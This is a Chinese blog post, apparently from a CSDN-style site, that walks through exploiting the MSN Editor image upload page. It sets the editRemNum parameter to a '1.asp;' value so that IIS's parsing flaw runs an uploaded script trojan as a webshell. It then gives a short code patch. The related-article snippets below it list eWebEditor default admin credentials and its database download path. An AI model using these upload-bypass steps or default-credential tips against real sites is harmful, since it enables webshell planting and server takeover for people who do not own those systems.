MSN Editor编辑器漏洞利用

最新推荐文章于 2022-12-23 11:17:37 发布
最新推荐文章于 2022-12-23 11:17:37 发布
阅读量628 收藏
点赞数
分类专栏: 学习日记 文章标签: date 浏览器 iis 脚本

简单说下利用的方法吧


点击图片上传后会出现上传页面,地址为

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的图片上传后,地址为
http://www.xxx.cn/news/uppic/41513102009204012_1.gif

记住这时候的路径

在点击图片的上传,这时候地址就变成了
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012

很明显。图片的地址是根据RemNum后面的编号生成的。

利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012

变成下面这个地址

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012

然后在浏览器里打开

然后选择你的脚本木马上传

将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif

然后直接打开就是我们的小马地址!

加上修补方法!

by:想你挡挡闯墙

关键代码:

             if editRemNum<>"" then               
                remNum = editRemNum
             else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"
          end if

哎,先不讲解了 。

去掉自定义部分,只留下随即参数即可。

保留代码:

                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"


文章来源: by 情博客

zxmsmile
关注
专栏目录
[系统安全] 五十五.恶意软件分析 (7)IDA Python基础用法及CFG控制流图提取详解[上]
杨秀璋的专栏
01-22 1221
前文介绍了软件来源分析,结合网络攻击中常见的判断方法,利用Python调用扩展包进行区域溯源。这篇文章将开启IDA Python学习,首先介绍IDA Python配置过程和基础用法,然后尝试地区恶意软件的控制流图(CFG),再为后续的恶意软件家族分类或溯源提供帮助。由于作者是初学者,因此会遇到很多问题,欢迎各位大佬和读者指导。基础性基础,且看且珍惜。
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
Foxit PDF Reader/Editor 任意代码执行漏洞
OSCS开源安全社区
12-23 591
Foxit PDF Reader/Editor 受影响版本中在对javascript对象执行操作之前未验证对象是否存在,造成内存引用处理不当,导致存在释放后重用漏洞。攻击者可以利用此漏洞在当前进程的上下文中执行任意代码。OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。Foxit PDF Reader是中国福昕(Foxit)公司的一款PDF阅读器。升级Foxit PDF Editor到 10.1.8、11.2.2 或更高版本。
编辑器漏洞手册
xiaoshan812613234的专栏
09-09 1532
简介 #2014年8月21日 最初的手册版本,是由北洋贱队的各位朋友收集整理。时隔4年,我们再次整理了这些文件。目的是希望这种传统能延续下去。我们相信:星星之火可以燎原。希望大家能多提建议,完善这份手册。 #2010年某月某日 创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群
MSN Editor 0DAY
caiguazheng4921的博客
04-19 69
简单说下利用的方法吧。 点击图片上传后会出现上传页面,地址为 http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum= 用普通的图片上传后,地址为 http://www.xxx.cn/news/admin/uploadPic.asp?language=&ed...
安全修复--任意文件上传
一杯咖啡的渗透记忆
03-07 3737
任意文件上传修复注意点如下: 1.文件大小的合理限制 (通用5M大小限制,具体可根据业务需求设置) 2.白名单检查文件扩展名 3.确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串 4.重命名上传的文件以避免可能导致现有文件被覆盖的冲突 5.隐藏上传文件路径 6.病毒扫描 (影响性能,根据客户需要设置) 7.上传文件的存储目录禁用执行权限 8.在完全验证之前不要将文件上传到服务器的永久文件系统. 9.内容检测要求: A. 文件类型根据具体业务需求设置...
网站漏洞修复之最新版本UEditor漏洞
热门推荐
网站安全专家
08-30 12万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文...
编辑器漏洞
01-30 514
一 : php escapeshellcmd多字节编码漏洞解析及延伸 漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txt PHP 5 <= 5.2.5 PHP 4 <= 4.4.8 一些允许如GBK,EUC-KR, SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后...
xheditor-1.1.14
08-07
参数值:编辑器所在的根路径,用在某些特殊情况下定位编辑器的根路径,默认为空,读取默认的编辑器根路径 备注:v1.1.0新添加 shortcuts:自定义键盘快捷方式 参数:快捷键对应事件代码的对象数组 示例:{'ctrl+...
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
JAVA上百实例源码以及开源项目源代码
12-11
Java 源码包 Applet钢琴模拟程序java源码 2个目标文件,提供基本的音乐编辑功能。编辑音乐软件的朋友,这款实例会对你有所帮助。 Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来...
百度编辑器安全漏洞及其防护措施
极客神殿
08-10 2264
跟老赵头儿学开发之十四 : 百度编辑器安全漏洞及其防护措施 百度编辑器UEditor 是一套开源的在线html编辑器,它是由百度web前端研发部开发的所见即所得的富文本web编辑器,开发人员可以用 UEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本框。 UEditor既可以录入文本也可以上传图片,还可以支持自定义的html编写,支持电脑端及移动端,自适应页面,图片也可...
web安全-上传漏洞-Ewebeditor编辑器漏洞利用
Coisini的博客
05-31 7961
Ewebeditor简介 漏洞利用 ***默认路径就不一定了,有可能是“edit/admin_login.asp”或者“admin/edit/admin_login.asp”。(默认密码后台:admin,admin) 如果eWebEditor的后台用户名和密码都已经被修改了,那么我们还可以通过下载数据库来获得管理员用户名和密码,数据库默认的下载路径为“/db/ewebeditor.mdb”。下载...
常见编辑器漏洞利用
qq_40529133的博客
04-24 2504
FCKeditor编辑器漏洞利用; EWEBeditor编辑器漏洞利用; 其他类型编辑器漏洞利用; 如何查看站点的编辑器类型: 前端用户可以利用“目录扫描”,“蜘蛛爬行”来查找编辑器。利用御剑的后台目录扫描可以找到放置在网站根目录下的编辑器名称: 如果编辑器不存在于网站根目录。可以在扫描站点后加上/admin,扫描管理员目录进一步挖掘。 还可以利用Googlehack 查找 比如 inurl:ew...
利用ewebeditor漏洞来攻击网站
eldn__的专栏
06-06 3825
原文:http://blog.163.com/chx_silk/blog/static/74422518200992214752475/ 大家好,今天给大家演示以下利用ewebeditor的程序漏洞入侵网站, 首先:访问www.xxx.com/eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮 如图: 呵呵:不过没关系,在
【渗透测试】编辑器漏洞
kali_Ma的博客
06-12 1527
FCKeditor FCKeditor 编辑器页 FCKeditor/_samples/default.htmlFCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp/sample04.aspfckeditor/editor/filemanager/
VB+ACCESS网吧计费系统(源代码+系统).zip
最新发布
09-18
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
基于C#的小区物业管理系统.docx
09-18
设计一个基于C#的小区物业管理系统是一个涉及多个方面和模块的复杂项目。这样的系统通常包括用户管理、房屋管理、费用管理、报修管理、投诉管理、公告管理等功能。下面我将简要概述如何构建一个基本的小区物业管理系统,包括其主要模块和一些关键概念。 1. 系统架构设计 前端界面:可以使用WinForms或WPF来构建桌面应用程序界面,也可以使用ASP.NET Core MVC或Blazor来构建Web界面。 后端逻辑:使用C#作为后端开发语言,结合.NET Core或.NET Framework来编写业务逻辑。 数据库:可以使用SQL Server、MySQL或SQLite等数据库来存储系统数据。 架构模式:考虑使用MVC(模型-视图-控制器)或三层架构(表示层、业务逻辑层、数据访问层)来组织代码。 2. 主要功能模块 2.1 用户管理 功能:管理小区业主、租户、物业工作人员等用户的信息。 关键操作:用户注册、登录、密码找回、用户信息编辑、权限管理等。 2.2 房屋管理 功能:管理小区内所有房屋的信息,包括房屋位置、面积、户型、业主信息等。 关键操作:房屋信息录入、查询、修改、删除、房屋状态更新
WEB编辑器漏洞分析手册
"WEB编辑器漏洞手册包含了对多个知名WEB编辑器如FCKeditor、eWebEditor、Cute Editor等的漏洞分析和更新描述。该手册由一系列的Include标签组织,详细列举了不同编辑器在特定日期出现的问题,旨在帮助用户了解和防范...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值